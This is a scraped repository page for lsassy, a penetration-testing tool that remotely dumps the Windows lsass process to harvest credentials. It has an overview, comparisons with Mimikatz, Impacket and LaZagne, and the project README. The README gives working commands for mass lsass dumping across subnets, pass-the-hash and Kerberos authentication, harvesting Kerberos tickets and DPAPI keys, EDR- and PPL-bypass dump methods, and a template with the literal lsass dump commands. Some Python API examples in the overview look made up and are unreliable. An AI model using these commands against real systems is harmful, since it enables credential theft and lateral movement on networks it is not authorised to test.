Convert Figma logo to code with AI

login-securite logolsassy

Extract credentials from lsass remotely

2,021
242
2,021
3

Top Related Projects

19,244

A little tool to play with Windows security

13,272

Impacket is a collection of Python classes for working with network protocols.

9,431

Credentials recovery project

Quick Overview

Lsassy is a Python tool designed for extracting credentials from lsass remotely. It leverages various techniques to dump and parse lsass memory, aiming to retrieve user credentials efficiently. This tool is primarily used for penetration testing and security assessments.

Pros

  • Offers remote credential extraction without requiring direct access to the target machine
  • Supports multiple dumping methods, increasing versatility and success rate
  • Integrates well with other security tools and frameworks
  • Actively maintained and regularly updated

Cons

  • Can be detected by some antivirus and endpoint detection and response (EDR) solutions
  • Requires administrative privileges on the target system
  • May cause system instability if not used carefully
  • Potential for misuse in unauthorized access attempts

Code Examples

# Initialize Lsassy with a target
from lsassy import Lsassy
lsassy = Lsassy("192.168.1.100")

# Dump and parse lsass memory
results = lsassy.dump_lsass()
# Use a specific dumping method
from lsassy.dumpers import DumpMethod
lsassy.dump_lsass(dump_method=DumpMethod.COMSVCS)
# Extract credentials from a local dump file
from lsassy import Parser
parser = Parser("lsass.dmp")
credentials = parser.parse()

Getting Started

To get started with Lsassy, follow these steps:

  1. Install Lsassy:

    pip install lsassy
    
  2. Basic usage:

    from lsassy import Lsassy
    
    target = "192.168.1.100"
    username = "administrator"
    password = "password123"
    
    lsassy = Lsassy(target, username=username, password=password)
    results = lsassy.dump_lsass()
    
    for result in results:
        print(result)
    

Remember to use this tool responsibly and only on systems you have permission to test.

Competitor Comparisons

19,244

A little tool to play with Windows security

Pros of Mimikatz

  • More comprehensive feature set for credential extraction and manipulation
  • Widely recognized and extensively documented
  • Supports a broader range of Windows versions and authentication mechanisms

Cons of Mimikatz

  • More likely to be flagged by antivirus software due to its popularity
  • Requires administrative privileges to run effectively
  • Larger codebase and more complex to use for simple credential extraction tasks

Code Comparison

Mimikatz (C):

BOOL WINAPI kuhl_m_sekurlsa_utils_search_generic(PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, PVOID * pPtr, PVOID val, SIZE_T szVal, PVOID * pInst, SIZE_T szInst, PVOID * pPtrs, SIZE_T szPtrs, PVOID * pPtr1, PVOID * pPtr2)
{
	BOOL status = FALSE;
	PVOID ptr;
	LONG offset;
	// ... (additional code)
}

LSassy (Python):

def parse_lsass(lsass_dump):
    mimikatz = Mimikatz(lsass_dump=lsass_dump)
    credentials = mimikatz.logonPasswords()
    return credentials

LSassy provides a higher-level Python interface for credential extraction, while Mimikatz offers lower-level C functions for more granular control and advanced features.

13,272

Impacket is a collection of Python classes for working with network protocols.

Pros of Impacket

  • Broader scope and functionality, covering various network protocols
  • Extensive documentation and active community support
  • More versatile, can be used for a wide range of network-related tasks

Cons of Impacket

  • Larger codebase, potentially more complex to use and maintain
  • May include unnecessary features for specific use cases
  • Requires more setup and configuration for certain tasks

Code Comparison

Impacket (SMB connection example):

from impacket.smbconnection import SMBConnection

conn = SMBConnection(remoteName, remoteHost, sess_port=int(port))
conn.login(username, password, domain)

Lsassy (Dumping credentials example):

from lsassy import Lsassy

lsassy = Lsassy(hostname, username, password)
results = lsassy.dump()

Summary

Impacket is a comprehensive network protocol library with a wide range of applications, while Lsassy is more focused on extracting credentials from lsass dumps. Impacket offers greater versatility but may be more complex, whereas Lsassy provides a streamlined solution for its specific use case. The choice between them depends on the project requirements and the desired balance between functionality and simplicity.

9,431

Credentials recovery project

Pros of LaZagne

  • Broader scope: Supports multiple operating systems (Windows, Linux, Mac)
  • More comprehensive: Retrieves passwords from a wide range of applications and browsers
  • Standalone executable: Can be run without additional dependencies

Cons of LaZagne

  • Less focused: Not specialized for specific credential extraction techniques
  • Potentially outdated: Some modules may not work with the latest application versions
  • Larger footprint: More likely to be detected by antivirus software due to its size and functionality

Code Comparison

LaZagne (Python):

def run_lazagne(category_selected="all", subcategories={}, password=None):
    for category in category_selected:
        for r in runModule(category):
            yield r

lsassy (Python):

def dump_lsass(self):
    try:
        self.lsass_process = self.get_lsass_process()
        self.lsass_dump = self.dump_process(self.lsass_process)
    except Exception as e:
        raise LsassyException(f"Failed to dump lsass: {e}")

The code snippets highlight the different approaches:

  • LaZagne iterates through categories and modules to extract various credentials
  • lsassy focuses specifically on dumping the LSASS process for credential extraction

Both tools serve different purposes, with LaZagne being more versatile and lsassy more specialized for LSASS dumping.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

lsassy

PyPI version PyPI Statistics Tests Twitter

Python tool to remotely extract credentials on a set of hosts. This blog post explains how it works.

This tool uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

ChaptersDescription
WarningBefore using this tool, read this
InstallationLsassy installation
Basic usageBasic lsassy usage
Advanced usageAdvanced lsassy usage with params explaination
Add dump methodHow to add a custom lsass dump method
AcknowledgmentsKudos to these people and tools
Official DiscordOfficial Discord server

Warning

Although I have made every effort to make the tool stable, traces may be left if errors occur.

This tool can either leave some lsass dumps if it failed to delete it (even though it tries hard to do so) or leave a scheduled task running if it fails to delete it. This shouldn't happen, but it might. Now, you know, use it with caution.

Installation

lsassy works with python >= 3.7

pip (Recommended)

python3 -m pip install lsassy

From source for development

python3 setup.py install

Basic Usage

lsassy works out of the box on multiple targets (IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets)

lsassy [-d domain] -u pixis -p P4ssw0rd targets
lsassy [-d domain] -u pixis -H [LM:]NT targets

By default, lsassy will try to dump lsass remotely using comsvcs.dll method, either via WMI or via a remote scheduled task.

Kerberos

lsassy can authenticate with Kerberos. It requires a valid TGT in KRB5CCNAME environment variable. See advanced usage for more details.

lsassy -k targets

Examples

 lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.0/24
 lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.1-10
 lsassy -d hackn.lab -u pixis -p P4ssw0rd hosts.txt
 lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.1-192.168.1.10

Advanced Usage

Different lsass dumping methods are implemented in lsassy, and some option are provided to give control to the user on how the tool will proceed.

Internal working

lsassy is divided in modules

                   +-----------+
                   |   Writer  |
                   +-----+-----+
                         |
                         |
 +----------+      +-----+-----+    +---------+
 |  Parser  |------|   Core    |----| Session |
 +----------+      +-----+-----+    +---------+
                         |
                         |
                   +-----------+
                   |    Dump   |-+
                   |  Methods  | |-+    +----------+
                   +-----+-----+ | |----|   File   |
                     +-----------+ |    +----------+
                      +------------+
                         |
                         |
                   +-----------+
                   |    Exec   |-+
                   |  Methods  | |-+
                   +-----+-----+ | |
                     +-----------+ |
                      +------------+

Core module

This module is the orchestrator. It creates lsassy class with provided arguments and options, and then calls the different modules to retrieve credentials.

Logger module

This module is used for logging purpose.

File module

This is a layer built over Impacket to behave like a python built-in file object. It overrides methods like open, read, seek, or close.

Dumper module

This module is where all the dumping logic happens. Depending on the method used, it will execute code on remote host to dump lsass using provided method.

Parser module

This module relies on pypykatz and uses lsassy file module to remotely parse lsass dump

Writer module

This module handles the output part, either to the screen in different formats and/or write results to a file

Dumping methods

This tool can dump lsass in different ways.

Dumping methods (-m or --method)

  • comsvcs
  • comsvcs_stealth
  • dllinject
  • procdump
  • procdump_embedded
  • dumpert
  • dumpertdll
  • ppldump
  • ppldump_embedded
  • mirrordump
  • mirrordump_embedded
  • wer
  • EDRSandBlast
  • nanodump
  • rdrleakdiag
  • silentprocessexit
  • sqldumper

comsvcs method

This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process.

Procdump method

This method uploads procdump.exe from SysInternals to dump lsass process.

Dumpert method

This method uploads dumpert.exe or dumpert.dll from outflanknl to dump lsass process using syscalls.

Ppldump

This method uploads ppldump.exe from itm4n to dump lsass process and bypass PPL.

Mirrordump

This method uploads Mirrordump.exe from Ccob to dump lsass using already opened handle to lsass via an LSA plugin.

WER

This method uses WER technique used in PowerSploit.

Options

For some dumping method, options are required, like procdump or dumpert path. These options can be set using --options or -O with a comma separated list of options in a key=value way.

... --options key=value,foo=bar

For example:

lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -m procdump    -O procdump_path=/opt/Sysinternals/procdump.exe
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -m dumpert     -O dumpert_path=/opt/dumpert.exe
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -m dumpertdll  -O dumpertdll_path=/opt/dumpert.dll

Parse only

You can choose to parse an already dumped lsass process by providing --parse-only switch, alongside with --dump-path and --dump-name parameters.

Note that if you choose this method, the remote lsass dump won't be deleted.

For example:

lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab --parse-only --dump-path "/Windows/Temp" --dump-name "lsass.dmp"

Keep dump

If you don't want the dump to be automatically deleted after lsassy run, you can use --keep-dump.

lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab --keep-dump

Kerberos tickets harvesting

Kerberos tickets will be extracted and saved to $HOME/.config/lsassy/tickets in kirbi format. You can specify output directory using -K [directory] or --kerberos-dir [directory] parameter. If this directory doesn't exist, the tool will attempt to create it before outputing tickets.

lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -K '/tmp/kerberos_tickets'

DPAPI Master Keys harvesting

DPAPI Master Keys will be extracted and saved to $HOME/.config/lsassy/masterkeys.txt in {GUID}:SHA1 format. You can specify masterkey file path using -M [path] or --masterkeys-file [path] parameter. If the file path doesn't exist, the tool will attempt to create it before creating the file.

lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -M '/tmp/keys.txt'

Authentication methods

There are three different ways to authenticate against remote targets using lsassy. The only requirement is that the user needs to have local administration rights on the remote targets.

Cleartext credentials

First and most obvious one is by using clear text credentials. It can either be a local or domain user.

## Local user
lsassy -u pixis -p P4ssw0rd server01.hackn.lab

## Domain user
lsassy -d hackn.lab -u jsnow -p WinterIsComing server01.hackn.lab

Pass-the-hash

It is also possible to authenticate using user's NT hash. You can either provide LM:NT or only NT version.

lsassy -d hackn.lab -u jsnow -H 38046f6aa4f7283f9a6b7e1575452109 server01.hackn.lab
aad3b435b51404eeaad3b435b51404ee

## Or

lsassy -d hackn.lab -u jsnow -H aad3b435b51404eeaad3b435b51404ee:38046f6aa4f7283f9a6b7e1575452109 server01.hackn.lab

Kerberos

You can also authenticate using Kerberos. For this to work, you will need to have a valid ticket saved on disk, and ticket's path needs to be provided in KRB5CCNAME environment variable. For testing purpose, this can be achieved using impacket getTGT.py tool.

getTGT.py hackn.lab/jsnow:WinterIsComing -dc-ip dc01.hackn.lab

This command will request a TGT and save it in jsnow.ccache file.

In order for lsassy to know which ticket to use, you'll need to explicitly set the ticket's path in KRB5CCNAME environment variable.

export KRB5CCNAME="/home/pixis/jsnow.ccache"

When it's correctly configured, you should be able to use that ticket for authentication using -k parameter. Since you're using this ticket, you don't need to provide other authentication information anymore.

lsassy -k server01.hackn.lab

Note that for this to work, you will need a valid DNS configuration, either dynamic with a valid DNS server, or static using hosts file. Moreover, you should always use FQDN when generating tickets and using lsassy, i.e. use server01.hackn.lab instead of server01.

Output

Screen format

lsassy can output credentials in different formats using --format or -f flag

Pretty

Default format, nice and clean credentials are displayed with golden colors. In credz we trust.

lsassy [-d domain] -u pixis -p P4ssw0rd --format pretty targets
Json

Displays result in json format. Can be useful when called from a script

lsassy [-d domain] -u pixis -p P4ssw0rd --format json targets
Grep

Grepable output that can be useful in one-liners

lsassy [-d domain] -u pixis -p P4ssw0rd --format grep targets
None

Doesn't display the result. Useful when using --outfile

lsassy [-d domain] -u pixis -p P4ssw0rd targets --format none

Save in a file

Saves the result in a grepable format in provided file (--outfile or -o)

lsassy [-d domain] -u pixis -p P4ssw0rd targets --format json --outfile /tmp/credentials.txt

Results filtering

If you want to only get users credentials, filtering out computers credentials, you can use --users flag

lsassy [-d domain] -u pixis -p P4ssw0rd targets --users

If you don't want tickets to be exported, you can use --no-tickets flag

lsassy [-d domain] -u pixis -p P4ssw0rd targets --no-tickets

If you don't want masterkeys to be exported, you can use --no-masterkeys flag

lsassy [-d domain] -u pixis -p P4ssw0rd targets --no-masterkeys

Thread management

You can decide how many thread you want to use [1-256] using --threads parameter.

lsassy [-d domain] -u pixis -p P4ssw0rd targets --threads 32

Add dump method

There is a dummy.py.tpl file in dumpmethod directory. This file contains basic structure to create a new dump method functionnality.

get_commands

This method is mandatory as it is the method that will be used to execute code on the remote host in order to dump lsass in some way. It must return a dictionnary with two items cmd and pwsh.

cmd command is a command understood by cmd.exe utility pwsh command is a command understood by powershell (most of the time, cmd command is also valid in powershell)

return {
    "cmd": cmd_command,
    "pwsh": pwsh_command
}

Dependencies

There is a Dependency class that can be used to easily upload files needed for dump method, like procdump.exe from sysinternals. Two methods can be used :

  • prepare_dependencies to check if all parameters were provided by the user to locally find the file on user's disk and upload it, and then actually upload the file
  • clean_dependencies to try and remove uploaded files

(Optionnal) prepare

This method will be called before executing commands provided by get_commands. It can be used to upload files or check stuff.

(Optionnal) clean

This method will be called after executing commands provided by get_commands. It can be used to delete uploaded files or clean stuff.

Example

Here is procdump example with some comments

from lsassy.dumpmethod import IDumpMethod, Dependency


class DumpMethod(IDumpMethod):
    """
    If your dumping method cannot produce a dumpfile with a custom dumpfile name, you must set this setting to False
    and uncomment 'dump_name' to provide expected dumpfile name on remote system.
    """
    custom_dump_name_support = True  # Default: True
    # dump_name              = ""    # Default: Random dumpfile name

    """
    If your dumping method cannot produce a dumpfile in a custom directory, you must set this setting to False
    and uncomment 'dump_share' and 'dump_path' to provide expected dumpfile location on remote system.
    If your dumping tool can have a custom dump name but not a custom dump extension, provide the dump extension in dump_ext variable
    In this example, procdump.exe will produce a dump wherever we want, with a name we choose, but will always add a .dmp extension.
    """
    custom_dump_path_support = True  # Default: True
    # dump_share             = ""    # Default: "C$"
    # dump_path              = ""    # Default: "\\Windows\\Temp\\"
    dump_ext                 = "dmp"

    def __init__(self, session, timeout):
        """
        __init__ is overloaded to create some instance variables
        """
        super().__init__(session, timeout)
        
        """
        This module requires procdump.exe to be uploaded on the remote server before being executed.
        So we add procdump as a Dependency. First argument is a name for our dependency (can be arbitrary),
        and second argument is default executable name on local user's disk.
        """
        self.procdump = Dependency("procdump", "procdump.exe")

    def prepare(self, options):
        """
        Prepare method is overloaded so that we are able to
        - check if mandatory parameters are provided
        - upload procdump on the remote host.
        All this can be done using prepare_dependencies method from our Dependency object
        """
        return self.prepare_dependencies(options, [self.procdump])

    def clean(self):
        """
        Clean method is overloaded so that we are able to delete our dependency if it was uploaded
        The clean_dependencies method will do this for us.
        """
        self.clean_dependencies([self.procdump])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        """
        get_commands method is overloaded as it is mandatory.
        Two different ways of dumping lsass with cmd.exe and powershell are provided and returned.
        The get_remote_path method of our Dependency object is used to get the correct remote path 
        of procdump on our target.
        """
        
        cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} -accepteula -o -ma %J {}{}""".format(
            self.procdump.get_remote_path(),
            self.dump_path, self.dump_name
        )
        pwsh_command = """{} -accepteula -o -ma (Get-Process lsass).Id {}{}""".format(
            self.procdump.get_remote_path(),
            self.dump_path, self.dump_name
        )
        return {
            "cmd": cmd_command,
            "pwsh": pwsh_command
        }

You can check dummy class for more comments and/or informations.

Acknowledgments

image

Official Discord

https://discord.hackndo.com

Known bugs

  • Compiled versions don't include table_output because of some weird error with rich library

Star History

Star History Chart